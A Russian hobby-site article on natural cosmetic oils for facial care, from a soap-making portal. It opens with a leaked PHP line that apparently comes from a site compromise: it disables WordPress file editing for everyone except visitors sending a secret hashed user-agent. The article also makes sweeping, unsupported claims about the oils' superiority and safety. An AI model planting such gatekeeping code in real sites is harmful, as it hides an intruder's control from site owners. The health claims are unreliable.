if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Косметические масла | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Косметические масла

Натуральные косметические масла – это одно из самых уникальных и незаменимых средств, применяемых в косметологии для ухода за кожей лица. Можно с уверенностью сказать, что они во много раз превосходят любую косметическую продукцию

Домашняя косметика - косметические масла Домашняя косметика - косметические масла

Нату­раль­ные кос­ме­ти­че­ские мас­ла – это одно из самых уни­каль­ных и неза­ме­ни­мых средств, при­ме­ня­е­мых в кос­ме­то­ло­гии для ухо­да за кожей лица.

Мож­но с уве­рен­но­стью ска­зать, что по сво­е­му соста­ву, полез­ным свой­ствам и дей­стви­ям они во мно­го раз пре­вос­хо­дят прак­ти­че­ски любую изго­тов­ля­е­мую кос­ме­ти­че­скую про­дук­цию. Чем же обу­слав­ли­ва­ет­ся такая чудо­дей­ствен­ность нату­раль­ных масел? Ну, во-пер­вых, в них не содер­жит­ся ника­кой «химии», кон­сер­ван­тов, кра­си­те­лей и про­чих искус­ствен­ных и вред­ных веществ, кото­рые мож­но встре­тить во мно­гих кре­мах. Ско­рее наобо­рот, кос­ме­ти­че­ские мас­ла – это при­род­ный и есте­ствен­ный ком­плекс боль­шо­го коли­че­ства вита­ми­нов, био­ло­ги­че­ски актив­ных веществ, жир­ных кис­лот и дру­гих полез­ных ком­по­нен­тов, необ­хо­ди­мых для нашей кожи.

Во-вто­рых, состав нату­раль­ных масел очень бли­зок к соста­ву кож­но­го жира чело­ве­ка, бла­го­да­ря чему они пре­крас­но вос­при­ни­ма­ют­ся кожей. В‑третьих, такие мас­ла в очень ред­ких слу­ча­ях спо­соб­ны вызвать аллер­ги­че­скую реак­цию и заме­ча­тель­но под­хо­дят для ухо­да даже за самой чув­стви­тель­ной кожей лица.

Кос­ме­ти­че­ские мас­ла полу­ча­ют в основ­ном мето­дом холод­но­го отжи­ма исклю­чи­тель­но из нату­раль­но­го и рас­ти­тель­но­го сырья, тако­го как пло­до­вые косточ­ки, оре­хи или же зер­на. Они заме­ча­тель­но под­хо­дят для всех типов кожи лица, но осо­бен­но их при­ме­не­ние реко­мен­ду­ет­ся при сухой и уже увя­да­ю­щей коже, а так­же для иссу­шен­ной и ста­ре­ю­щей кожи вокруг глаз.

Основ­ные дей­ствия нату­раль­ных рас­ти­тель­ных масел — это, преж­де все­го, пита­ние, смяг­че­ние и увлаж­не­ние кожи, а так­же предот­вра­ще­ние ее ста­ре­ния, омо­ло­же­ние, раз­гла­жи­ва­ние мор­щин, повы­ше­ние тону­са, упру­го­сти и эла­стич­но­сти кожи. Но, тем не менее, их мож­но исполь­зо­вать и в ухо­де за более жир­ной и про­блем­ной кожей, так как мно­гие из них обла­да­ют еще и хоро­ши­ми про­ти­во­вос­па­ли­тель­ны­ми свой­ства­ми, а так­же спо­соб­ству­ют нор­ма­ли­за­ции функ­ции саль­ных желез.

Спектр при­ме­не­ния рас­ти­тель­ных масел доволь­но таки широк. Так, напри­мер, прак­ти­че­ски любое нату­раль­ное мас­ло или же их смесь мож­но исполь­зо­вать, как и в каче­стве кре­ма или мас­ки для лица, так и в каче­стве очи­ща­ю­ще­го тони­ка. Мож­но так­же добав­лять их в уже гото­вые мага­зин­ные кре­мы и дру­гие сред­ства для ухо­да за лицом (лосьо­ны, сред­ства для умы­ва­ния, мас­ки, кре­мы и гели для век).

Кро­ме того, кос­ме­ти­че­ские мас­ла явля­ют­ся одним из самых основ­ных ингре­ди­ен­тов для само­сто­я­тель­но­го при­го­тов­ле­ния кре­мов, ну и, конеч­но же, их мож­но исполь­зо­вать в при­го­тов­ле­нии мыла.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!